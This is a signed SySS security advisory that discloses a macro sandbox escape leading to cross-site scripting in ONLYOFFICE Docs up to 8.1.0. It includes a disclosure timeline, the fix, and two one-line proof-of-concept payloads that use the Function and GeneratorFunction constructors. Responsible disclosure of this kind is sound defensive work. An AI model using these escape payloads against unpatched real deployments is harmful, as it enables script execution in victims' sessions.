-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-027 Product: ONLYOFFICE Docs Manufacturer: Ascensio System SIA Affected Version(s): All versions up to 8.1.0 Tested Version(s): 7.5.0, 8.0.1 and 8.1.0 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2023-11-15 Solution Date: 2024-06-19 Public Disclosure: 2024-09-05 CVE Reference: CVE-2023-50883, CVE-2024-44085 Author of Advisory: Anton Fabricius, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: ONLYOFFICE Docs is an open-source office suite that allows creating, editing, and collaborating on documents, spreadsheets, and presentations. It is similar to other office suites like Microsoft Office and LibreOffice, but is designed to be used online. The manufacturer describes the product as follows (see [1]): "ONLYOFFICE Docs, a powerful online editor for text documents, spreadsheets, presentations, forms and PDF reader for the platform you use" Previously, as documented in CVE-2021-43446, the "macros" feature of the online editor was vulnerable to cross-site scripting[2]. The vendor addressed this report by adding a sandbox. Due to improper sandboxing and sanitizing of user input, the macro function is vulnerable to a sandbox escape leading to cross-site scripting. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Macros are defined as an immediately invoked function expression (IIFE) in the following form: (function(){})(); The IIFE gets passed to the JavaSript function "eval()" inside a sandboxing method. Since user input is not sanitized, the sandbox can be escaped by directly calling the constructor of the "Function" object, which dynamically creates a function. Unlike "eval" (which may have access to the local scope), the "Function" constructor creates functions which execute in the global scope[3], escaping the local scope of the sandboxing method. The original sandbox escape vector was fixed with the release of version 8.0.1. However, the issue still persists up to version 8.1.0, since it is possible to use a "GeneratorFunction" object instead of the "Function" object to bypass the mitigation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Entering the following payload as a value for a macro will escape the sandbox and execute the JavaScript function "alert()" in the global scope of the application upon macro execution. Up until version 8.0.1: (function(){}).constructor("alert(document.domain)")(); Up until version 8.1.0: ((function*(){}).constructor('alert(document.domain)'))().next() ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Remove or disable the macro plug-in feature. Update to ONLYOFFICE version 8.1.0 or later. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-11-10: Vulnerability discovered 2023-11-15: Vulnerability reported to manufacturer 2024-02-26: Initial fix of the vulnerability introduced in version 8.0.1 2024-04-15: Alternative way for exploitation discovered 2024-04-15: Reported to manufacturer that the vulnerability still persists 2024-06-19: Vulnerability fixed in version 8.1.0 2024-09-05: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for ONLYOFFICE Docs https://www.onlyoffice.com/office-suite.aspx [2] https://nvd.nist.gov/vuln/detail/CVE-2021-43446 [3] Reference: Global objects – Function() constructor https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/Function [4] SySS Security Advisory SYSS-2023-027 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-027.txt [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Anton Fabricius of SySS GmbH. E-Mail: anton.fabricius@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Anton_Fabricius.asc Key Fingerprint: 7E4A CE2E 2334 832E 21DC 6D26 3D41 5992 1805 5A0A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEfkrOLiM0gy4h3G0mPUFZkhgFWgoFAmbZqekACgkQPUFZkhgF WgrFnxAAi8kb9CT6JuIJ9nqJirxzUU+FIc8OJEN7OXosEbzHQN+7XEnD3omJDvD7 1c2AuNultgAK8rAMA2rfz3bSNjlMhpANdmRRY23Sz1+N9JWjQtV6gepubujH4utk P4d3DodPOzCvHJMl+x5ZQCY5mEJA16Ae+4KCd0fC2DW3qJ6K8NGX0qR9gWWYKRXT +dgxpIMkV/tEAr0g5vm2pMIn5rXahAb7sJ0y8Z6BPK6rZzFqcgWn4o/+BeVW2n2e VE9lRbwfXGwK1kW2pfXO/u63grvri+txsgsDoZaSq4NHchYtwdPlmDxLSrctSI32 o2eXEaiDvFtFE7fb8XAOMuGp7v3+OsK1rdUeUazFGTw8xJxB3IteqfmNB+8Mr3wp DaCv0Cl3VD7UU5RQysDkNZv0LBFZY1yRTfWwzm96khEqksP49aygTODmWHRqPMsj 453wFi8Z0wf2EvpR69AEiL1eUAu13Dsx4W11jPfSh+PLhflCuxeZrspeuvOaR3+t caJ7ki1rFHL6MCjecfXrW8inQ4J2NQyPe0Rfjgqd4stTaHAZdTqXniFbLWLWuwZ1 mgRA1VWMDyGDLcEtJcUUP4XI+zbqJp2TmQdFkmqNi6G6z28R0Df9zd813ess6S8h aMJIxUfyZHbidnezYUMWq3FvQ65fqlQPYT4G/H42o556gJi0W28= =QaRF -----END PGP SIGNATURE-----